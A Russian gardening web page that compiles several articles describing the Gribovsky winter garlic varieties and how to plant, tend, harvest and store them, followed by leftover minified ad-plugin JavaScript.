8 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание сорта чеснока грибовский

Сорт чеснока Грибовский

Чеснок можно встретить практически на любом дачном участке. Культура относится к семейству луковых, имеет острый вкус и считается одним из лучших природных антисептиков и антибиотиков. Озимый чеснок Грибовский – один из самых распространенных сортов. Он простой в выращивании и может долго храниться. Описание сорта и методика выращивания представлены в этой статье.

Описание сорта чеснока Грибовский

Сорт чеснока Грибовский относится к известным озимым видам. Срок созревания 80-125 суток – в зависимости от климата и разновидности. Во время роста обязательно выпускает стрелку, которая иногда вырастает до метра. Соцветие представляет собой плотный зеленый зонтик с обилием небольших бульб. Листочки длиной 15-40 см и шириной до 2,5 см. Всего на растении за сезон вырастает примерно 10 листочков.

В каждой головке может быть 5-12 зубцов среднего размера

Форма луковицы округло-сплюснутая. Шелуха сухая сверху, немного желтовата с лиловыми или фиолетовыми жилками. Головки имеют вес от 30 до 60 г, бывают и рекордсмены, под 100 г. В каждой головке может быть 5-12 зубцов среднего размера. Вкус всегда острый. Используют этот чеснок по большей расти в кулинарии, а также в народной медицине, косметологии.

Разновидности Грибовского чеснока

Существует несколько разновидностей чеснока сорта Грибовский. Они очень похожи, хотя обладают и уникальными качествами.

  • Грибовский Юбилейный – озимый, стрелкующийся сорт. Созревает за 100-105 суток. Головка среднего размера с красно-лиловой чешуей, содержит около 6 зубочков. Обладает хорошим иммунитетом и может долго храниться. Вкус очень острый. Урожайность с квадрата посадок примерно 2 кг.
  • Грибовский 80 – стрелкующийся, озимый сорт. Легко приспосабливается к любым погодным условиям, поэтому ареал выращивания довольно широк. Лежкость средняя, но при должных условиях хранится немало. Головка содержит до 11 зубцов. Вкус очень насыщенный.
  • Грибовский 60 – это урожайный, стрелкующийся подвид Грибовского. Он имеет высокую стойкость к похолоданиям и даже небольшим заморозкам, не боится засухи. Головка имеет средние размеры (40-60 г). Зубков от 5 до 12 штук. Иммунитет неплохой. Может долго храниться после сбора. Вкус острый.

Посадка чеснока Грибовский

Посадка чеснока Грибовский

Выращивают озимый чеснок Грибовский обычно однозубковыми луковицами. Отводят под эту культуру только хорошо дренированный, увлажненный грунт. Место подходит солнечное. Хорошо растет чеснок после капусты, огурцов и бобовых. Его также можно посадить в междурядье клубники.

Посадка проводится поздней осенью, прямо перед самыми осенними заморозками. До посадки головка делится на зубочки. Земля заранее рыхлится, разравнивается. Сажают зубки в борозды глубиной 2-3 см. Между растениями должно быть не меньше 10 см свободного места. Между рядами оставляют по 15-20 см свободного пространства. Во время посадки стоит следить, чтобы верхняя часть зубца, где наклевывается побег, смотрела вверх, а не вниз.

После посадки, когда борозды с зубцами уже засыпаны землей, междурядья мульчируют, чтобы земля насыщалась кислородом, полезными веществами, а влага меньше выветривалась. Можно мульчировать и сами ряды с чесноком, но только если зимы в регионе бесснежные, иначе появится риск более раннего проклевывания, а это грозит вымерзанием посадок. До появления первых ростков весной, посадки не трогают вообще.

Уход за культурой

Когда стебли и листочки начнут желтеть, можно начинать собирать урожай

Как и в случае любой иной огородной культуры, чеснок Грибовский требует внимательного ухода на протяжении роста.

  • Полив проводится примерно раз в неделю. Но этот показатель может меняться в зависимости от погоды, типа почвы, а также от состояния грядок. Известно, что чем больше сорных растений, тем чаще нужно проводить полив! Примерно за 3 недели до сбора чеснока поливы прекращают полностью.
  • Рыхлить землю необходимо обязательно также раз в неделю. Это делается для того, чтобы головка могла правильно развиваться. Проводят процедуру через сутки после полива, когда вся вода хорошо впитается в землю. Во время этой процедуры желательно избавляться от сорняков. Их вырывают с корнем и сжигают.
  • Подкормки чеснока Грибовский рекомендуются в первую очередь ранней весной, чтобы культура быстро росла и наращивала перья. Используются для этого азотные минералы. Под конец весны и летом подкормки проводят только по необходимости. Хорошими для культуры считают фосфорные, азотные минералы, а также куриный помет.
  • Примерно в июне, когда стрелка уже выросла на 10-15 см, необходимо ее срезать. В таком случае растение направит силы на развитие головки, а не стрелки с бульбами. Для получения посадочного материала обычно оставляют несколько стрелок.

Если уход был правильным, огородник получит богатый урожай с крупными головками чеснока. Он будет иметь хороший, насыщенный вкус, приятный аромат и сможет храниться на протяжении нескольких месяцев.

Сбор и хранение урожая

Хранить чеснок можно разными методами

Когда стебли и листочки культуры начнут желтеть, а потом полягут, можно начинать собирать урожай чеснока Грибовский. Головки выкапывают осторожно, вилами и оставляют лежать на солнце, чтобы просохли и дозрели.

Перед закладкой на хранение у чеснока обрезают ботву, просушивают его хорошенько от нескольких дней до недель и перебирают. Важно рассортировать головки по размеру и качеству. Самые большие, мелкие и поврежденные идут на еду в первую очередь, а те, что целые, среднего размера, можно убрать подальше, они лежат дольше всего. Хранить чеснок можно разными методами. Чаще всего их складывают в сетки и подвешивают в прохладном, темном месте, где нет сырости и сквозняков.

Отзывы о чесноке Грибовский

Мнение огородников о сорте чеснока Грибовский обычно положительное. Жалуются на него в редких случаях, и это не удивительно, ведь сорт считается одним из лучших!

  • Марина Сорокина: «Чеснок у себя на участке сажаю ежегодно. Люблю экспериментировать с новыми сортами, но для страховки всегда высаживаю минимум пару длинных рядов сорта Грибовский Юбилейный. Этот чеснок растет хорошо, быстро развивается и если правильно ухаживать, дает приличный урожай».
  • Степан Павлов: «Озимый чеснок Грибовский 60 хорош для любых блюд. Он, конечно очень острый, зато полезный. В плане выращивания есть только одна проблема – головки иногда растут очень маленькими. В чем причина непонятно – грунт рыхлый, сорняков нет. Но, благо такие экземпляры попадаются редко».
  • Валерия Иванова: «Выращивала Грибовский чеснок не только на даче, но даже дома, в горшке. Это, не очень просто, но опыт был интересный. Сорт хорошо растет, откликается на подкормки. По вкусу более чем достойный соперник многим другим сортам. В блюда его можно класть не много (из-за остроты). Хранится без проблем, главное только в погребе обеспечить нормальную вентиляцию, иначе начинает гнить».

Чеснок Юбилейный грибовский — описание сорта

Со рт Вес луко вицы, гр Уро жай нос ть, кг/ м2 Зуб цы, шт Лёж кос ть, мес Выз ре ва ние, дн ей
Юбилейный грибовский 24 — 44 1.5 — 1.7 8 — 10 3 100 — 105

Грибовский – общее название целой группы сортов чеснока, выведенных отечественными селекционерами. Из них выделяется Юбилейный Грибовский – сорт, появившийся в 1976 году. Он рекомендуется к выращиванию в средней полосе и южной части России, а вот на сибирских и дальневосточных землях приживается плохо. В Белоруссии с середины 80-х годов этот тип растения признан основным для культивирования. Среди российских фермеров он также считается наиболее популярным и востребованным сортом. Известность Юбилейный Грибовский получил и среди фермеров Казахстана.

Описание сорта, его характеристики, урожайность

Это озимый сорт чеснока, дающий крупные стрелки – около 1 м в высоту. Широкие и длинные листья имеют матово-зеленый цвет и покрыты восковидным налетом средней насыщенности. Головки плоскоокруглые, имеют 8-10 зубчиков. Вес корнеплодов достигает 50 г и более. Сочные чешуйки, покрывающие зубцы, имеют кремовую окраску с фиолетовыми прожилками, шелуха тоже фиолетовая.

Грибовский Юбилейный – средний по созреванию сорт, этот период составляет от 100 до 105 дней. Он отличается достаточно высокой урожайностью: при хороших условиях с 1 кв. м можно получить до 2 кг луковиц.

Благодаря высокому содержанию эфирных масел эта разновидность чеснока обладает очень острым вкусом. Содержание сухих веществ в мякоти тоже достаточно высокое – не менее 41%. Все это делает его подходящим для приготовления различных приправ. Впрочем, хорош он и в других целях, в частности, для консервирования и непосредственно для еды.

Грибовский Юбилейный был получен из сортов, наиболее близких к дикому чесноку. Благодаря этому он характеризуется очень высокой устойчивостью к инфекционным заболеваниям и вредителям. Другими его достоинствами являются хорошая зимостойкость, способность длительно сохранять свежесть и хорошо переносить транспортировку. В отличие от многих других сортов, Грибовский Юбилейный способен очень быстро приспосабливаться к изменяющимся условиям выращивания, что и обеспечило ему достаточно широкую распространенность. Все эти достоинства растения были подтверждены в ходе экспериментов.

Выращивание чеснока Юбилейный Грибовский. Когда и как сажать? Как ухаживать?

Наверное, это один из лучших сортов озимого чеснока. Он лидирует по отзывам в федеральном рейтинге лучших сортов! Купить его — это хороший выбор! Попробуйте — не пожалеете!

Зубчики Грибовского высевают осенью (в разных регионах максимальные сроки высаживания колеблются от середины октября до середины ноября) за 20-30 дней до наступления морозов. Для выращивания используются легкие супесчаные или суглинистые почвы. Для получения хорошего урожая необходимо выбирать только самые освещенные места, так как даже небольшое затенение может быть губительным для этого растения.

Высаживать лучше всего самые крупные или средние по величине зубки. Мелкие части лучше использовать для еды, в качестве посадочного материала они не пригодны. На приготовленном посадочном материале не должно быть повреждений. Пригодны только крепкие и плотные зубчики. Землю незадолго до посадочных работ желательно удобрить. Рекомендуется также обработать зубчики марганцовкой, несмотря на их хорошую способность сопротивляться болезням. Можно также обрабатывать чеснок для посадки особыми стимуляторами для ускорения корнеобразования.

Зубчики следует углублять в землю на 6-10 см в зависимости от легкости почвы. Некоторые специалисты рекомендуют располагать ребро к югу, если планируется получить пышную здоровую стрелку. Посадки засыпают мульчей для лучшего перенесения морозов. По окончании зимы мульча убирается, что обеспечивает приток свежего весеннего воздуха и позволяет всходам беспрепятственно прорастать.

Весной необходимо провести 2-3 подкормки, одна из которых должна приходиться на самое раннее время – сразу после таяния снега. Также немаловажно удалять стрелки, чтобы обеспечить поступление питательных веществ непосредственно к луковицам. Это позволит получить максимально большие и тяжелые головки.

Секреты сбора урожая и длительного хранения

За 20 дней до планируемого сбора чеснока его прекращают поливать и подкармливать. Благодаря этому луковицы не будут водянистыми и приобретут больше вкуса и остроты. При сборе головки следует аккуратно выкопать из почвы и разложить на открытом воздухе в местах, хорошо продуваемых ветром. Выкапывать корнеплоды лучше в солнечную погоду. Место просушивания не должно освещаться прямыми солнечными лучами или иметь избыточную влажность. Для полного высыхания чеснока потребуется примерно 1,5-2 недели. Только после этого можно срезать корни и стебли. В противном случае плоды будут храниться не так долго и будут склонны к гниению.

Хранить луковицы чеснока Юбилейный Грибовский лучше всего в комнате при температуре 18-20 градусов. Часть урожая можно отправить в погреб или холодильник, чтобы головки не теряли своей упругости и твердости.

Чеснок озимый ‘Юбилейный грибовский’

Латинское название: allium sativum ‘ubileyniy gribovskiy’

Основной род : Чеснок
Урожайность
  • высокая
Срок созревания
  • среднепоздний
Тип почвы
  • супесчаная
  • суглинки/глина
Способ выращивания
  • открытый грунт
Назначение плодов
  • универсальное
Устойчивость к болезням
  • средняя
Требования к ph почвы
  • слабокислая (ph 5.5 — 6.5)
  • нейтральная (ph 6.5-7)
Жизненная форма
  • однолетник
Форма плодов/стеблеплодов/корне- и клубнеплодов/кочанов
  • округло-плоская
Размер плодов/стеблеплодов/корне- и клубнеплодов/кочанов
  • Не указано
Регион возделывания по оригинатору
  • Центральный регион
  • Центрально-Черноземный регион
  • Волго-Вятский регион
  • Средневолжский регион
  • Нижневолжский регион
  • Западно-Сибирский регион
  • Восточно-Сибирский регион
  • Крымский регион
  • Северо-Кавказский регион
  • Северо-Западный регион
Витаминность
  • высокая
Цвет плодов/корне- и клубнеплодов
    Цвет листьев/стеблеплодов/кочанов
      Цвет мякоти плодов/корне- и клубнеплодов
        Толщина корки
        • Не применимо
        Устойчивость к заморозкам
        • Да
        Засухоустойчивость
        • Не указано
        Декоративная ценность
        • Нет
        Вкус плодов
        • острый
        Укрытие на зиму
        • Не указано
        Устойчивость к вредителям
        • средняя
        Габитус
        • Не указано
        Лежкость
        • Не указано
        Партенокарпический
        • Не применимо
        Характер ветвления
        • Не применимо
        Плотность и характер мякоти
        • Плотная

        Развернуть все свойства

        Описание растения:

        Чеснок озимый ‘Юбилейный грибовский’ — сорт, выведенный во Всероссийском НИИ селекции и семеноводства овощных культур. Допущен к использованию по всей территории Российской Федерации (кроме Северного, Уральского и Дальневосточного регионов) в 1976 году.

        Сорт относится к стрелкующимся. Ценится за хорошую зимостойкость.

        Размеры и форма роста:

        Листья матово-зеленые, со средним восковым налетом.

        Луковицы:

        Размер, форма и цвет:

        У представителей сорта ‘Юбилейный грибовский’ луковицы округло-плоские, со сбегом вверх, плотные. Количество зубков 8–10, строение простое.

        Количество наружных чешуй среднее (4–6). Сочные чешуи кремового цвета.

        Луковицы обладают острым вкусом.

        Сроки созревания и урожайность:

        Чеснок озимый ‘Юбилейный грибовский’ относится к среднепоздним сортам. Период от полных всходов до полегания листьев 100–105 дней. Урожайность составляет 1.5–1.7 кг/м 2 .

        Устойчивость к болезням:

        Сорт относительно устойчив к болезням и вредителям.

        Чеснок сорта Грибовский: описание

        Многие блюда невозможно оценить в полной мере без использования при приготовлении такого ингредиента, как чеснок. Это растение обладает особенными вкусовыми свойствами, что позволяет внести особые нотки в большое количество блюд. Кроме того, чеснок обладает прекрасными лечебными свойствами. По этим причинам большинство людей, имеющих собственный загородный участок или дачу, стараются высаживать чеснок, тем более для этого есть все возможности.

        Сорт Грибовский-80 дает стабильно высокие урожай

        Среди популярных озимых сортов особым спросом пользуется — Грибовский. Что же это за чеснок, описание, какие он имеет характеристики и особенности выращивания, стоит разобраться подробнее.

        Общая характеристика

        Сорт Грибовский — чеснок, относящийся к озимым сортам. Грибовский — обобщённое наименование нескольких сортов. К наиболее распространённым и часто встречающимся разновидностям относятся:

        • Грибовский Юбилейный. Выведен в 1976 году в результате научной селекции.
        • Грибовский 80.
        • Грибовский 60.

        Головка чеснока Грибовский Юбилейный

        Характеристика сорта

        • Как и большинство озимых сортов выпускает стрелы. Стрела без внешних воздействий может вырастать более одного метра в длину.
        • Соцветие – плотный зонтик зелёного цвета, в котором формируются луковицы — бульбочки.
        • Длина листа – 15—40 см. Ширина – до 2,5 см. Количество листьев – около 10.
        • Относится к среднеспелым сортам. Вегетативный период – от 80 до 125 дней, в зависимости от региона выращивания и разновидности.
        • Устойчивость к поражениям грибковыми и бактериальными заболеваниями.
        • Высокий уровень приспособления к различным условиям климата и местности. Этот
        • чеснок устойчив к перепадам температур.
        • Высокая или средняя зимостойкость и засухоустойчивость.
        • Высаживается однозубковыми луковицами.
          Имеет длительный срок хранения. Лежкость Юбилейного – средняя.

        Однозубки сорта Грибовский-60, выращенные из бульбочек

        Описание луковицы

        • Вес – от 30 до 60 грамм. Установлены случаи получения луковиц весом в 100 грамм. В среднем вырастают луковицы весом в 35 грамм.
        • В одной луковице формируется от 5 до 12 зубков.
        • Головка немного приплюснутая, овальная, со сбегом вверх.
        • Сухая кожица зубков имеет жёлтый цвет с красно-лиловыми (Грибовский 80) или фиолетовыми (Юбилейный) прожилками.
        • Зубки ровные и широкие.
        • Вкус – острый. «Грибовские» сорта чеснока имеют универсальное назначение.

        Особенности посадки и ухода

        Сорт Грибовский оптимален для высадки осенью. Посадка производится за 20—30 дней до наступления погоды с устойчивыми низкими температурами и заморозками. Этот период приходится на конец сентября — середину октября, в зависимости от региона выращивания. Более ранняя высадка приведёт к снижению уровня приживаемости и укоренения. Кроме того, чеснок может прорости до наступления зимы, а это потребует принятия дополнительных мер по защите от холодов. Более поздняя высадка может привести к гибели чеснока из-за вымерзания, так как он не успеет прижиться.

        Подготовка к посадке в октябре

        Для посадки лучше всего выбирать крупные и средние зубки, которые не имеют видимых внешних повреждений кожицы, отличаются плотностью и «здоровым» цветом.

        Особое внимание стоит уделить выбору места для чеснока на участке. Это растение светолюбивое, по этой причине выбираются открытые участки, подальше от возможных затенений кустарником, деревьями или строениями. Грядки не должны подтапливаться водой. Почва предпочтительно должна быть суглинистой или супесчаной. Чеснок не любит тяжёлых почв.

        Посадка производится в удобренную и взрыхлённую почву. Удобрение вносится при осенней перекопке. Не стоит использовать одну и ту же грядку под чеснок длительное время. Так как чеснок болеет теми же болезнями что и лук, их не стоит чередовать. Не стоит этого делать и с картофелем. Лучше использовать участки, где выращивались другие культуры, а землю, из которой был убран чеснок, засадить овощами или зеленью.

        Всходы Грибовского чеснока весной

        Чеснок хорошо растёт на грядках, где выращивались бобовые, огурцы или капуста.

        В качестве удобрения чаще всего применяется перегной с добавлением небольшого количества минеральных элементов. Уместно использование навоза или компоста. Перед посадкой зубки обрабатывают раствором марганцовки для укрепления и повышения «иммунитета».

        Правила высадки

        • Глубина, на которую помещается зубчик в почву, должна варьироваться от 5 до 7 см. Всё зависит от размера посадочного материала.
        • Для удобства чеснок садится на небольшие грядки рядами. Расстояние между рядами должно равняться 30 см.
        • Расстояние между растениями в ряду зависит от размера «чесночин», оно варьируется от 10 до 15 см.
        • Междурядья мульчируются для насыщения кислородом и сохранения влаги.

        Промышленное выращивание сорта Грибовский

        Весенний и летний уход состоит из следующих мероприятий

        1. Полив. При отсутствии осадков полив производится 1 раз в 5—7 дней, в зависимости от дневных температур и состояния почвы.
        2. Подкормка. Обязательно выполнить 2—3 подкормки весной: ранней весной, после того, как растаял снег, вначале и середине апреля. В последующем процедура выполняется по мере необходимости, в зависимости от состояния чеснока, характера его роста. В качестве эффективных средств подходят куриный помёт, азотсодержащие и фосфорсодержащие вещества.

        Стрелки Грибовского лучше удалять, чтобы луковица была больше

        За 20 дней до сбора урожая полив и подкормки прекращаются. Это позволит избежать «водянистости» луковиц, зубки «наберут» вкуса и аромата.

        Бульбочки чеснока сорта Грибовский можно использовать для обновления

        После выкапывания, чеснок необходимо просушить. Для этого его выкладывают на хорошо проветриваемом участке, защищённом от прямых солнечных лучей и влаги. После просушки, чеснок чистится, сортируется и готовится к хранению. Для хранения отлично подходят тёплые места, с хорошей вентиляцией.

        Запись Чеснок сорта Грибовский: описание впервые появилась SeloMoe.

        Озимый чеснок Грибовский: характеристика сорта, выращивание, уход

        Прогресс не стоит на месте, постоянно развиваясь. Однако лучшего средства от простуды, более аппетитной приправы, чем чеснок, не изобрели. Огородники каждое лето прикладывают усилия, создавая запасы целебного овоща, который всегда желанный гость на кухне. Рынок предлагает большой выбор, где нельзя ошибаться, необходимо отобрать самое лучшее.

        Описание сорта

        Следует уточнить, что «Грибовский» объединяет несколько подвидов. Наиболее часто встречаются:

        • Грибовский 60
        • Грибовский 80
        • Грибовский Юбилейный

        Все аналоги принадлежат к озимому, выпускающему стрелку, среднеспелому по своему времени вызревания сорту (чеснок Грибовский 60 самого быстрого созревания), который длится от 80 до 125 дней.

        Посадка производится под зиму на в открытом грунте. Культура устойчива к пониженным температурам, приносит суперурожай, дает возможность ранее остальных получить первые плоды.

        Луковица

        Форма Овальная, имеет вытянутый хвостик
        Масса 30-60 г, максимально 100 г
        Количество зубьев в головке 5-12
        Вкус Острый, характерный чесночный аромат
        Цвет чешуек Молочный с фиолетовыми прожилками
        Применение Неоценимая польза при использовании в свежем виде, незаменимость при консервации и в кулинарии

        Растение

        Стрела Одна, без подрезания достигает 1-1,5 м
        Соцветие Зонтик зелёного цвета, в котором происходит формирование семян
        Лист длина 15-40 см
        Ширина 2,5 см
        Количество в среднем 10

        Чеснок Грибовский не обладает крупным размером головок, но имеет другие неоспоримые положительные характеристики.

        • Иммунитет к основным известным заболеваниям.
        • Отличная переносимость как холодов, так и засушливых периодов.
        • Обладает возможностью приспособиться к климатическим особенностям.
        • Универсальность использования.
        • При длительном хранении сохраняются необходимые качества(лишь чеснок Грибовский Юбилейный имеет меньший срок хранения).

        Мнение огородников

        Чеснок Грибовский полностью оправдывает заявленные преимущества, но, как любой овощ, требует внимания и ухода при выращивании.

        Совет: при выборе посадочного материала берутся самые крупные зубчики, не имеющие внешних повреждений, что служит гарантией крупных здоровых плодов.

        Отдельной похвалы заслужили вкусовые качества и универсальность применения. Небольшие нарекания вызывает только Грибовский Юбилейный чеснок за счет более короткого периода сохранности своих свойств.

        Посадка

        При посадке зимних сортов чеснока есть преимущества: более ранний урожай, высокая устойчивость культуры к неблагоприятным влияниям. Необходимо вовремя посадить озимые, дабы пожинать отменный результат.

        Время посева

        Время посева выбирается так, чтобы у семян не было возможности прорасти еще осенью, зависит от климата района проживания. Сроки не ограничены определёнными датами, но за 45-50 дней до прихода зимних морозов -9°С зубчики должны находиться в земле и успеть сформировать пучок корней. Чаще — это середина или конец октября.

        Подготовка почвы

        Для чеснока Грибовский выбирается открытый, хорошо освещённый участок, не подверженный подтапливанию по весне. Грядки должны быть высокими, которые не рекомендуется располагать, если предшественники лук или картофель. Хорошо сажать после бобовых или капусты.

        За 14 дней до посадочных мероприятий почва облегчается при перемешивании поверхностного слоя с торфом, другим удобрением, зависящим от состава конкретной земли.

        Подготовка материала для посева

        Необходимо отобрать только крупные, здоровые, без малейших признаков повреждения зубья, что позволит прорасти крупной чесночной луковице. Для защиты от возможного развития патогенной флоры, семена на 20-30 мин замачивают в комплексном растворе фунгицидов или жидкости со слабой концентрацией марганцовокислого калия.

        Методы и схема

        Посадка зубчиков

        Считается наиболее традиционным вариантом.

        • Рядки располагают в 25-30 см друг от друга.
        • Углубления располагаются в 10-15 см друг от друга
        • Зубчики располагают вглубь на 4 см, при повышенной плотности почвы — 5-6 см.

        Посадка бульбочек

        Метод применяется, если размер зубчиков мельчает, необходимо улучшить качество урожая. Проходит в 3 этапа:

        • Высаживаются самые крупные головки, после появления стрелок с бульбочками, производится отбор наиболее больших.
        • Через год сажают семена предыдущего урожая, получив головки с одним зубцом без стрелок.
        • Производят посадку полученных однозубковых головок, в результате имея полноценные стрелкообразующие головки.

        Схема

        • Между рядами 20 см;
        • Крупные бульбочки располагаются на расстоянии 15 см, помельче – 10 см;
        • Внедряется материал для посадки на 5 см.

        Для удержания влаги, защиты от сорной травы необходимо междурядье покрыть слоем измельчённого сена.

        Для хорошего роста и формирования луковиц уход рекомендуется начинать весной, как только сойдёт снег.

        Полив

        В описании чеснока Грибовский заостряется внимание на неприхотливости сорта к поливу. Однако при отсутствии дождей, производить его требуется не реже раза в неделю, не переусердствовав, дабы не возникла прикорневая гниль, не активизировался рост грибков.

        Пропалывание, рыхление

        Эти мероприятия необходимы для хорошего роста, лучшего насыщения почвы кислородом, влагой. Результат при сборе урожая послужит благодарностью за потраченные усилия. Сорняки подлежат полному уничтожению по мере их появления.

        Борьба с болезнями и вредителями

        В описании чеснока Грибовский указывается на высокую степень противостояния многочисленным заболеваниям, что не отменяет защищающих процедур.

        • Перед посадкой зубчикам необходимо пройти обработку биологическим препаратом, которым после возможно оросить сами грядки.
        • Основной метод борьбы — строгая отбраковка посевного материала. Даже если зубчики здоровы на вид, но изъяты из больной луковицы, к посеву непригодны.
        • Юбилейный Грибовский имеет отличную устойчивостью к фузариозу.

        Удобрение

        Первую подкормку аммиачной селитрой необходимо провести перед сходом снега, дав корням набраться сил, далее необходимо провести ещё две манипуляции через каждые 2 недели.

        Растение благотворно отреагирует на комплексный состав удобрений, куриный помет. Во всём важна мера, переусердствовав с удобрением, можно получить скоропортящийся урожай.

        Обрезание стрелок

        Процедура необходима в июне при достижении стрелкой 15 см, при удалении которой, все питательные компоненты пойдут на формирование и развитие головки. Исключение составляют стрелки, из которых в дальнейшем сформируется посевной материал.

        За 20 дней до предполагаемого срока уборки урожая, надо прекратить полив, удобрение. В это время зубки будут набираться вкуса и аппетитного аромата.

        Сбор урожая и хранение

        Как только стебли желтеют и начинают клониться к земле — пришло время уборки чеснока, чаще это выпадает на конец июля. Убираются головки аккуратно, не выдёргивая, а выкапывая.

        Дальше, во избежание загнивания, плоды требуется хорошенько просушить на открытом участке, с защитой от влаги, солнца или в проветриваемом здании. По прошествии 10 дней производится отбраковка, сортировка, очистка и дальнейшая подготовка к хранению.

        Чеснок, не пригодный для хранения, следует сразу использовать, остальное фасуется в тару и убирается в место, предназначенное для хранения при температуре 4-5°С.

        Советы для хорошего урожая

        • При посадке дольками максимальное углубление 6 см, бульбочками — 5 см.
        • Место посадки должно быть защищено от весеннего затопления.
        • Следить за снежным покрытием зимой — при недостатке озимые вымерзают.
        • Необходимо разбивать образовавшуюся ледовую корку, открывая доступ кислороду.
        • После посадки верхний слой посыпает золой, что увеличивает срок хранения.

        Ссылка на основную публикацию
        Adblock
        detector
        ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
        '+c+"
        "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
        Закрыть через '+o.how.outgoing.timer_count+"
        ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
        '+c+"
        ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
        '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
        "],tbody:[1,"","
        "],colgroup:[2,"","
        "],col:[3,"","
        "],tr:[2,"","
        "],td:[3,"","
        "],th:[3,"","
